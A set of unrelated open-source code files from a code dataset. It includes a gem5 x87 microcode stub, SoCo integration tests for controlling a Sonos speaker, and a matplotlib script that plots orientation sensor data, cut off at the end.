res['os_version'] = release[1]
res['os_hostname'] = self.args[1]
return res
if __name__ == '__main__':
o = State( os.uname() )
print o.get()
| bsd-3-clause |
rallylee/gem5 | src/arch/x86/isa/insts/x87/compare_and_test/classify.py | 91 | 2149 | # Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
# FXAM
'''
| bsd-3-clause |
KennethNielsen/SoCo | tests/test_integration.py | 1 | 36566 | # -*- coding: utf-8 -*-
# pylint: disable-msg=too-few-public-methods, redefined-outer-name, no-self-use
"""This file contains the classes used to perform integration tests on the
methods in the SoCo class. They access a real Sonos system.
PLEASE TAKE NOTE: All of these tests are designed to run on a Sonos system
without interfering with normal service. This means that they must not raise
the volume or must leave the player in the same state as they found it in. They
have been made this way since SoCo is developed by volunteers who in all
likelihood do not have a dedicated test system. Accordingly the tests must not
annoy the neighbors, and should return the system to its original state so that
the developers can listen to their music while coding, without having it
interrupted at every unit test!
PLEASE RESPECT THIS.
"""
from __future__ import unicode_literals
import time
import pytest
import soco as soco_module
from soco.data_structures import (
DidlMusicTrack,
DidlPlaylistContainer,
SearchResult,
)
from soco.music_library import MusicLibrary
from soco.exceptions import SoCoUPnPException
# Mark all tests in this module with the pytest custom "integration" marker so
# they can be selected or deselected as a whole, eg:
# py.test -m "integration"
# or
# py.test -m "no integration"
pytestmark = pytest.mark.integration
@pytest.yield_fixture(scope="session")
def soco(request):
"""Set up and tear down the soco fixture used by all tests."""
# Get the ip address from the command line, and create the soco object
# Only one is used per test session, hence the decorator
ip = request.config.option.IP
if ip is None:
pytest.fail("No ip address specified. Use the --ip option.")
soco_instance = soco_module.SoCo(ip)
# Check the device is playing and has items in the queue
if len(soco_instance.get_queue()) == 0:
pytest.fail(
"Integration tests on the SoCo class must be run "
"with at least 1 item in the playlist."
)
transport_info = soco_instance.get_current_transport_info()
if transport_info["current_transport_state"] != "PLAYING":
pytest.fail(
"Integration tests on the SoCo class must be run "
"with the Sonos unit playing."
)
# Save the device's state
state = {
"queue": soco_instance.get_queue(0, 1000),
"current_track_info": soco_instance.get_current_track_info(),
}
# Yield the device to the test function
yield soco_instance
# Tear down. Restore state
soco_instance.stop()
soco_instance.clear_queue()
for track in state["queue"]:
soco_instance.add_to_queue(track)
soco_instance.play_from_queue(
int(state["current_track_info"]["playlist_position"]) - 1
)
soco_instance.seek(state["current_track_info"]["position"])
soco_instance.play()
def wait(interval=0.1):
"""Convenience function to adjust sleep interval for all tests."""
time.sleep(interval)
class TestVolume(object):
"""Integration tests for the volume property."""
valid_values = range(101)
@pytest.yield_fixture(autouse=True)
def restore_volume(self, soco):
"""A fixture which restores volume after each test in the class is
run."""
old = soco.volume
yield
soco.volume = old
wait()
def test_get_and_set(self, soco):
"""Test if the set functionlity works when given valid arguments."""
old = soco.volume
assert old in self.valid_values
if old == self.valid_values[0]:
new = old + 1
else:
new = old - 1
soco.volume = new
wait()
assert soco.volume == new
def test_invalid_arguments(self, soco):
"""Test if the set functionality coerces into range when given integers
outside of allowed range."""
# NOTE We don't test coerce from too large values, since that would
# put the unit at full volume
soco.volume = self.valid_values[0] - 1
wait()
assert soco.volume == 0
def test_set_0(self):
"""Test whether the volume can be set to 0. Regression test for:
https://github.com/rahims/soco/issues/29
"""
soco.volume = 0
wait()
assert soco.volume == 0
class TestBass(object):
"""Integration tests for the bass property.
This class implements a full boundary value test.
"""
valid_values = range(-10, 11)
@pytest.yield_fixture(autouse=True)
def restore_bass(self, soco):
"""A fixture which restores bass EQ after each test in the class is
run."""
old = soco.bass
yield
soco.bass = old
wait()
def test_get_and_set(self, soco):
"""Test if the set functionlity works when given valid arguments."""
assert soco.bass in self.valid_values
# Values on the boundaries of the valid equivalence partition
for value in [self.valid_values[0], self.valid_values[-1]]:
soco.bass = value
wait()
assert soco.bass == value
def test_invalid_arguments(self, soco):
"""Test if the set functionality produces the expected "coerce in
range" functionality when given a value outside of its range."""
# Values on the boundaries of the two invalid equivalence partitions
soco.bass = self.valid_values[0] - 1
wait()
assert soco.bass == self.valid_values[0]
soco.bass = self.valid_values[-1] + 1
wait()
assert soco.bass == self.valid_values[-1]
class TestTreble(object):
"""Integration tests for the treble property.
This class implements a full boundary value test.
"""
valid_values = range(-10, 11)
@pytest.yield_fixture(autouse=True)
def restore_treble(self, soco):
"""A fixture which restores treble EQ after each test in the class is
run."""
old = soco.treble
yield
soco.treble = old
wait()
def test_get_and_set(self, soco):
"""Test if the set functionlity works when given valid arguments."""
assert soco.treble in self.valid_values
# Values on the boundaries of the valid equivalence partition
for value in [self.valid_values[0], self.valid_values[-1]]:
soco.treble = value
wait()
assert soco.treble == value
def test_invalid_arguments(self, soco):
"""Test if the set functionality produces the expected "coerce in
range" functionality when given a value outside its range."""
# Values on the boundaries of the two invalid equivalence partitions
soco.treble = self.valid_values[0] - 1
wait()
assert soco.treble == self.valid_values[0]
soco.treble = self.valid_values[-1] + 1
wait()
assert soco.treble == self.valid_values[-1]
class TestMute(object):
"""Integration test for the mute method."""
def test(self, soco):
"""Test if the mute method works."""
old = soco.mute
assert old is False, (
"The unit should not be muted when running " "the unit tests."
)
soco.mute = True
wait()
new = soco.mute
assert new is True
soco.mute = False
wait()
assert soco.mute is False
class TestGetCurrentTransportInfo(object):
"""Integration test for the get_current_transport_info method."""
# The values in this list must be kept up to date with the values in
# the test doc string
transport_info_keys = sorted(
[
"current_transport_status",
"current_transport_state",
"current_transport_speed",
]
)
def test(self, soco):
"""Test if the return value is a dictionary that contains the keys:
current_transport_status, current_transport_state,
current_transport_speed and that values have been found for all keys,
i.e. they are not None.
"""
transport_info = soco.get_current_transport_info()
assert isinstance(transport_info, dict)
assert self.transport_info_keys == sorted(transport_info.keys())
for _, value in transport_info.items():
assert value is not None
class TestTransport(object):
"""Integration tests for transport methods (play, pause etc)."""
def test_pause_and_play(self, soco):
"""Test if the pause and play methods work."""
soco.pause()
wait(1)
on_pause = soco.get_current_transport_info()["current_transport_state"]
assert on_pause == "PAUSED_PLAYBACK"
soco.play()
wait(1)
on_play = soco.get_current_transport_info()["current_transport_state"]
assert on_play == "PLAYING"
def test_stop(self, soco):
"""Test if the stop method works."""
soco.stop()
wait(1)
new = soco.get_current_transport_info()["current_transport_state"]
assert new == "STOPPED"
soco.play()
wait(1)
on_play = soco.get_current_transport_info()["current_transport_state"]
assert on_play == "PLAYING"
def test_seek_valid(self, soco):
"""Test if the seek method works with valid input."""
original_position = soco.get_current_track_info()["position"]
# Format 1
soco.seek("0:00:00")
wait()
position = soco.get_current_track_info()["position"]
assert position in ["0:00:00", "0:00:01"]
# Reset and format 2
soco.seek(original_position)
soco.seek("00:00:00")
wait()
position = soco.get_current_track_info()["position"]
assert position in ["0:00:00", "0:00:01"]
# Clean up
soco.seek(original_position)
wait()
def test_seek_invald(self, soco):
"""Test if the seek method properly fails with invalid input."""
for string in ["invalid_time_string", "5:12", "6", "aa:aa:aa"]:
with pytest.raises(ValueError):
soco.seek(string)
class TestGetCurrentTrackInfo(object):
"""Integration test for the get_current_track_info method."""
info_keys = sorted(
[
"album",
"artist",
"title",
"uri",
"metadata",
"playlist_position",
"duration",
"album_art",
"position",
]
)
def test_get(self, soco):
"""Test is the return value is a dictinary and contains the following
keys: album, artist, title, uri, playlist_position, duration,
album_art and position.
"""
info = soco.get_current_track_info()
assert isinstance(info, dict)
assert sorted(info.keys()) == self.info_keys
class TestGetSpeakerInfo(object):
"""Integration test for the get_speaker_info method."""
# The values in this list must be kept up to date with the values in
# the test doc string
info_keys = sorted(
[
"zone_name",
"zone_icon",
"uid",
"serial_number",
"software_version",
"hardware_version",
"mac_address",
]
)
def test(self, soco):
"""Test if the return value is a dictionary that contains the keys:
zone_name, zone_icon, uid, serial_number, software_version,
hardware_version, mac_address
and that values have been found for all keys, i.e. they are not None.
"""
speaker_info = soco.get_speaker_info()
assert isinstance(speaker_info, dict)
for _, value in speaker_info.items():
assert value is not None
# TODO: test GetSpeakersIp
class TestGetQueue(object):
"""Integration test for the get_queue method."""
# The values in this list must be kept up to date with the values in
# the test doc string
queue_element_keys = sorted(
["album", "creator", "resources", "album_art_uri", "title"]
)
def test_get(self, soco):
"""Test is return value is a list of DidlMusicTracks and if each of
the objects contain the attributes: album, creator, resources,
album_art_uri and title.
"""
queue = soco.get_queue(0, 100)
assert isinstance(queue, list)
for item in queue:
assert isinstance(item, DidlMusicTrack)
for key in self.queue_element_keys:
assert getattr(item, key)
class TestAddToQueue(object):
"""Integration test for the add_to_queue method."""
def test_add_to_queue(self, soco):
"""Get the current queue, add the last item of the current queue and
then compare the length of the old queue with the new and check that
the last two elements are identical."""
old_queue = soco.get_queue(0, 1000)
# Add new element and check
assert (soco.add_to_queue(old_queue[-1])) == len(old_queue) + 1
wait()
new_queue = soco.get_queue()
assert (len(new_queue) - 1) == len(old_queue)
assert (new_queue[-1].title) == (new_queue[-2].title)
class TestRemoveFromQueue(object):
"""Integration test for the remove_from_queue method."""
def test(self, soco):
"""Test if the remove_from_queue method works."""
old_queue = soco.get_queue()
soco.remove_from_queue(len(old_queue) - 1) # queue index is 0 based
wait()
new_queue = soco.get_queue()
assert old_queue != new_queue, (
"No difference between " "queues before and after removing the last item"
)
assert len(new_queue) == len(old_queue) - 1
class TestSonosPlaylist(object):
"""Integration tests for Sonos Playlist Management."""
existing_playlists = None
playlist_name = "zSocoTestPlayList42"
@pytest.yield_fixture(autouse=True)
def restore_sonos_playlists(self, soco):
"""A fixture which cleans up after each sonos playlist test."""
if self.existing_playlists is None:
self.existing_playlists = soco.get_sonos_playlists()
if self.playlist_name in [x.title for x in self.existing_playlists]:
msg = "%s is an existing playlist." % self.playlist_name
pytest.fail(msg)
yield
for sonos_playlist in soco.get_sonos_playlists():
if sonos_playlist.title == self.playlist_name:
soco.remove_sonos_playlist(sonos_playlist=sonos_playlist)
def test_create(self, soco):
"""Test creating a new empty Sonos playlist."""
existing_playlists = {x.item_id for x in soco.get_sonos_playlists()}
new_playlist = soco.create_sonos_playlist(title=self.playlist_name)
assert type(new_playlist) is DidlPlaylistContainer
new_pl = {x.item_id for x in soco.get_sonos_playlists()}
assert new_pl != existing_playlists
assert new_pl - existing_playlists == {new_playlist.item_id}
def test_create_from_queue(self, soco):
"""Test creating a Sonos playlist from the current queue."""
playlist = soco.create_sonos_playlist_from_queue(self.playlist_name)
assert type(playlist) is DidlPlaylistContainer
prslt = soco.music_library.browse(ml_item=playlist)
qrslt = soco.get_queue()
assert len(prslt) == len(qrslt)
assert prslt.total_matches == qrslt.total_matches
assert prslt.number_returned == qrslt.number_returned
# compare uri because item_id is different, SQ:xx/n for playlist
for p_item, q_item in zip(prslt, qrslt):
assert p_item.resources[0].uri == q_item.resources[0].uri
def test_remove_playlist(self, soco):
"""Test removing a Sonos playlist."""
# a place holder, remove_sonos_playlist is exercised in the
# 'restore_sonos_playlists'
pass
def test_remove_playlist_itemid(self, soco):
"""Test removing a Sonos playlist by item_id."""
new_playlist = soco.create_sonos_playlist(title=self.playlist_name)
assert type(new_playlist) is DidlPlaylistContainer
assert soco.remove_sonos_playlist(new_playlist.item_id)
found = False
for sonos_playlist in soco.get_sonos_playlists():
if sonos_playlist.title == self.playlist_name:
found = True
break
assert found is False, "new_playlist was not removed by item_id"
def test_remove_playlist_bad_id(self, soco):
"""Test attempting to remove a Sonos playlist using a bad id."""
# junky bad
with pytest.raises(SoCoUPnPException):
soco.remove_sonos_playlist("SQ:-7")
# realistic non-existing
playlists = soco.get_sonos_playlists()
# Accommodate the case of no existing playlists
if len(playlists) == 0:
hpl_i = 0
else:
hpl_i = max([int(x.item_id.split(":")[1]) for x in playlists])
with pytest.raises(SoCoUPnPException):
soco.remove_sonos_playlist("SQ:{}".format(hpl_i + 1))
class TestTimer(object):
"""Integration tests for timers on Sonos"""
existing_timer = None
@pytest.yield_fixture(autouse=True)
def restore_timer(self, soco):
"""A fixture which cleans up after each timer test."""
existing_timer = soco.get_sleep_timer()
yield
soco.set_sleep_timer(existing_timer)
def test_get_set_timer(self, soco):
"""Test setting the timer"""
assert soco.set_sleep_timer(7200) is None
result = soco.get_sleep_timer()
if not any(result == s for s in [7200, 7199, 7198]):
pytest.fail(
"Set timer to 7200, but sonos reports back time as %s"
% result["RemainingSleepTimerDuration"]
)
class TestReorderSonosPlaylist(object):
"""Integration tests for Sonos Playlist Management."""
existing_playlists = None
playlist_name = "zSocoTestPlayList42"
test_playlist = None
queue_length = None
@pytest.yield_fixture(autouse=True, scope="class")
def restore_sonos_playlists(self, soco):
"""A fixture which cleans up after each sonos playlist test."""
if self.existing_playlists is None:
self.existing_playlists = soco.get_sonos_playlists()
if self.playlist_name in [x.title for x in self.existing_playlists]:
msg = "%s is an existing playlist." % self.playlist_name
pytest.fail(msg)
queue_list = soco.get_queue()
if len(queue_list) < 2:
msg = "You must have 3 or more items in your queue for testing."
pytest.fail(msg)
playlist = soco.create_sonos_playlist_from_queue(self.playlist_name)
self.__class__.queue_length = soco.queue_size
self.__class__.test_playlist = playlist
yield
soco.contentDirectory.DestroyObject([("ObjectID", self.test_playlist.item_id)])
def _reset_spl_contents(self, soco):
"""Ensure test playlist matches queue for each test."""
soco.contentDirectory.DestroyObject([("ObjectID", self.test_playlist.item_id)])
playlist = soco.create_sonos_playlist_from_queue(self.playlist_name)
self.__class__.test_playlist = playlist
return playlist, self.__class__.queue_length
def test_reverse_track_order(self, soco):
"""Test reversing the tracks in the Sonos playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = ",".join([str(x) for x in reversed(range(num_tracks))])
new_pos = ",".join([str(x) for x in range(num_tracks)])
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == 0
assert response["length"] == num_tracks
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
for s_item, q_item in zip(spl, reversed(soco.get_queue())):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_swap_first_two_items(self, soco):
"""Test a use case in doc string. Swapping the positions of the first
two tracks in the Sonos playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = [
0,
]
new_pos = [
1,
]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == 0
assert response["length"] == num_tracks
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
assert spl[0].resources[0].uri == que[1].resources[0].uri
assert spl[1].resources[0].uri == que[0].resources[0].uri
# FIXME remove the list on spl and que before slicing, when
# the deprecated __getitem__ on ListOfMusicInfoItems is
# removed
for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_remove_first_track(self, soco):
"""Test removing first track from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = [
0,
]
new_pos = [
None,
]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1
assert response["length"] == num_tracks - 1
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
# FIXME remove the list on queue() call, when the deprecated
# __getitem__ on ListOfMusicInfoItems is removed
que = list(soco.get_queue())[1:]
for s_item, q_item in zip(spl, que):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_remove_first_track_full(self, soco):
"""Test removing first track from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = [0] + list(range(num_tracks - 1)) # [0, 0, 1, ..., n-1]
new_pos = [None,] + list(
range(num_tracks - 1)
) # [None, 0, ..., n-1]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1
assert response["length"] == num_tracks - 1
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
# FIXME remove the list on queue() call, when the deprecated
# __getitem__ on ListOfMusicInfoItems is removed
que = list(soco.get_queue())[1:]
for s_item, q_item in zip(spl, que):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_remove_last_track(self, soco):
"""Test removing last track from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = range(num_tracks)
new_pos = list(range(num_tracks - 1)) + [
None,
]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1
assert response["length"] == num_tracks - 1
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
# FIXME remove the list on queue() call, when the deprecated
# __getitem__ on ListOfMusicInfoItems is removed
que = list(soco.get_queue())[:-1]
for s_item, q_item in zip(spl, que):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_remove_between_track(self, soco):
"""Test removing a middle track from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
ndx = int(num_tracks / 2)
tracks = [ndx]
new_pos = [None]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1
assert response["length"] == num_tracks - 1
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
del que[ndx]
for s_item, q_item in zip(spl, que):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_remove_some_tracks(self, soco): # pylint: disable=R0914
"""Test removing some tracks from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
# get rid of the even numbered tracks
tracks = sorted([x for x in range(num_tracks) if not x & 1], reverse=True)
new_pos = [None for _ in tracks]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1 * len(new_pos)
assert response["length"] == num_tracks + response["change"]
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
for ndx in tracks:
del que[ndx]
for s_item, q_item in zip(spl, que):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_remove_all_tracks(self, soco):
"""Test removing all tracks from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
# get rid of the even numbered tracks
tracks = sorted(range(num_tracks), reverse=True)
new_pos = [None for _ in tracks]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1 * num_tracks
assert response["length"] == num_tracks + response["change"]
assert response["length"] == 0
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
assert len(spl) == 0
def test_reorder_and_remove_track(self, soco):
"""Test reorder and removing a track from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = [1, 2]
new_pos = [0, None]
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1
assert response["length"] == num_tracks + response["change"]
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
assert spl[0].resources[0].uri == que[1].resources[0].uri
def test_object_id_is_object(self, soco):
"""Test removing all tracks from Sonos Playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = sorted(range(num_tracks), reverse=True)
new_pos = [None for _ in tracks]
args = {"sonos_playlist": test_playlist, "tracks": tracks, "new_pos": new_pos}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1 * num_tracks
assert response["length"] == num_tracks + response["change"]
assert response["length"] == 0
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
assert len(spl) == 0
def test_remove_all_string(self, soco):
"""Remove all in one op by using strings."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
# we know what we are doing
tracks = ",".join([str(x) for x in range(num_tracks)])
new_pos = ""
args = {"sonos_playlist": test_playlist, "tracks": tracks, "new_pos": new_pos}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1 * num_tracks
assert response["length"] == num_tracks + response["change"]
assert response["length"] == 0
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
assert len(spl) == 0
def test_remove_and_reorder_string(self, soco):
"""test remove then reorder using string arguments."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = "0,2" # trackA, trackB, trackC, ...
new_pos = ",0" # trackC, trackB, ...
args = {"sonos_playlist": test_playlist, "tracks": tracks, "new_pos": new_pos}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == -1
assert response["length"] == num_tracks + response["change"]
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
assert spl[0].resources[0].uri == que[2].resources[0].uri
assert spl[1].resources[0].uri == que[1].resources[0].uri
def test_move_track_string(self, soco):
"""Test a simple move with strings."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = "0"
new_pos = "1"
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == 0
assert response["length"] == num_tracks
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
assert spl[0].resources[0].uri == que[1].resources[0].uri
assert spl[1].resources[0].uri == que[0].resources[0].uri
# FIXME remove the list on spl and que before slicing, when
# the deprecated __getitem__ on ListOfMusicInfoItems is
# removed
for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_move_track_int(self, soco):
"""Test a simple move with ints."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
tracks = 1
new_pos = 0
args = {
"sonos_playlist": test_playlist.item_id,
"tracks": tracks,
"new_pos": new_pos,
}
response = soco.reorder_sonos_playlist(**args)
assert response["change"] == 0
assert response["length"] == num_tracks
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
assert spl[0].resources[0].uri == que[1].resources[0].uri
assert spl[1].resources[0].uri == que[0].resources[0].uri
# FIXME remove the list on spl and que before slicing, when
# the deprecated __getitem__ on ListOfMusicInfoItems is
# removed
for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_clear_sonos_playlist(self, soco):
"""Test the clear_sonos_playlist helper function."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
response = soco.clear_sonos_playlist(test_playlist)
assert response["change"] == -1 * num_tracks
assert response["length"] == num_tracks + response["change"]
assert response["length"] == 0
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
assert len(spl) == 0
def test_clear_empty_sonos_playlist(self, soco):
"""Test clearing an already empty Sonos playlist."""
test_playlist, _ = self._reset_spl_contents(soco)
response = soco.clear_sonos_playlist(test_playlist)
assert response["length"] == 0
update_id = response["update_id"]
new_response = soco.clear_sonos_playlist(test_playlist, update_id=update_id)
assert new_response["change"] == 0
assert new_response["length"] == 0
assert new_response["update_id"] == update_id
def test_move_in_sonos_playlist(self, soco):
"""Test method move_in_sonos_playlist."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
args = {"sonos_playlist": test_playlist.item_id, "track": 0, "new_pos": 1}
response = soco.move_in_sonos_playlist(**args)
assert response["change"] == 0
assert response["length"] == num_tracks
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
que = soco.get_queue()
assert spl[0].resources[0].uri == que[1].resources[0].uri
assert spl[1].resources[0].uri == que[0].resources[0].uri
# FIXME remove the list on spl and que before slicing, when
# the deprecated __getitem__ on ListOfMusicInfoItems is
# removed
for s_item, q_item in zip(list(spl)[2:], list(que)[2:]):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_remove_from_sonos_playlist(self, soco):
"""Test remove_from_sonos_playlist method."""
test_playlist, num_tracks = self._reset_spl_contents(soco)
args = {"sonos_playlist": test_playlist.item_id, "track": 0}
response = soco.remove_from_sonos_playlist(**args)
assert response["change"] == -1
assert response["length"] == num_tracks - 1
assert response["update_id"] != 0
spl = soco.music_library.browse(ml_item=test_playlist)
# FIXME remove the list on queue() call, when the deprecated
# __getitem__ on ListOfMusicInfoItems is removed
que = list(soco.get_queue())[1:]
for s_item, q_item in zip(spl, que):
assert s_item.resources[0].uri == q_item.resources[0].uri
def test_get_sonos_playlist_by_attr(self, soco):
"""Test test_get_sonos_playlist_by_attr."""
test_playlist, _ = self._reset_spl_contents(soco)
by_name = soco.get_sonos_playlist_by_attr("title", self.playlist_name)
assert test_playlist.item_id == by_name.item_id
by_id = soco.get_sonos_playlist_by_attr("item_id", test_playlist.item_id)
assert test_playlist.item_id == by_id.item_id
with pytest.raises(AttributeError):
soco.get_sonos_playlist_by_attr("fred", "wilma")
with pytest.raises(ValueError):
soco.get_sonos_playlist_by_attr("item_id", "wilma")
class TestMusicLibrary(object):
"""The the music library methods"""
search_types = list(MusicLibrary.SEARCH_TRANSLATION.keys())
specific_search_methods = (
"artists",
"album_artists",
"albums",
"genres",
"composers",
"tracks",
"playlists",
"sonos_favorites",
"favorite_radio_stations",
"favorite_radio_shows",
)
@pytest.mark.parametrize("search_type", specific_search_methods)
def test_from_specific_search_methods(self, soco, search_type):
"""Test getting favorites from the music library"""
search_method = getattr(soco.music_library, "get_" + search_type)
search_result = search_method()
assert isinstance(search_result, SearchResult)
@pytest.mark.parametrize("search_type", search_types)
def test_music_library_information(self, soco, search_type):
"""Test getting favorites from the music library"""
search_result = soco.music_library.get_music_library_information(search_type)
assert isinstance(search_result, SearchResult)
| mit |
Debaq/Triada | FullAxis_GUI/DB/BASE DE DATOS EXPERIMENTO/experimento 3/gaby hernandez/medidor3.py | 27 | 3052 | import argparse
import sys
import matplotlib
import matplotlib.pyplot as plt
from matplotlib.gridspec import GridSpec
import numpy as np
import json
parser = argparse.ArgumentParser(description="Does some awesome things.")
parser.add_argument('message', type=str, help="pass a message into the script")
args = parser.parse_args(sys.argv[1:])
data = []
New_data=[]
dt=[]
with open(args.message) as json_file:
data = json.load(json_file)
def graph(grid,d_tiempo):
plt.switch_backend('TkAgg') #default on my system
f = plt.figure(num=args.message, figsize=(20,15))
mng = plt._pylab_helpers.Gcf.figs.get(f.number, None)
print(New_data)
mng = plt.get_current_fig_manager()
mng.resize(*mng.window.maxsize())
plt.title(args.message)
if grid == 1:
tempo = d_tiempo
tempo_init = tempo[0]
tempo_end = tempo[-1]
gs1 = GridSpec(4, 1)
gs1.update(left=0.05, right=0.95, wspace=0.5, hspace=0.3, bottom=0.08)
ax1 = plt.subplot(gs1[0, :])
ax1.grid()
ax1.set_ylabel('Pitch',fontsize=8)
if grid ==1:
L1 = ax1.plot(d_tiempo,New_data['pitch'])
else:
L1 = ax1.plot(d_tiempo,data['pitch'])
ax2 = plt.subplot(gs1[1, :])
ax2.grid()
ax2.set_ylabel('Roll',fontsize=8)
if grid ==1:
L1 = ax2.plot(d_tiempo,New_data['roll'])
else:
L1 = ax2.plot(d_tiempo,data['roll'])
ax3 = plt.subplot(gs1[2, :])
ax3.grid()
ax3.set_ylabel('Yaw',fontsize=8)
if grid ==1:
L1 = ax3.plot(d_tiempo,New_data['yaw'])
else:
L1 = ax3.plot(d_tiempo,data['yaw'])
ax4 = plt.subplot(gs1[3, :])
ax4.grid()
ax4.set_ylabel('Tiempo',fontsize=8)
if grid ==1:
L1 = ax4.plot(d_tiempo,New_data['ledblue'])
L2 = ax4.plot(d_tiempo,New_data['ledred'])
else:
L1 = ax4.plot(d_tiempo,data['ledblue'])
L2 = ax4.plot(d_tiempo,data['ledred'])
plt.show()
def find_nearest(array,values):
idx = np.abs(np.subtract.outer(array, values)).argmin(0)
return idx
def corte(init_cut,end_cut,a,b,c,d,e,f,g,h,i):
a=a[init_cut:end_cut]
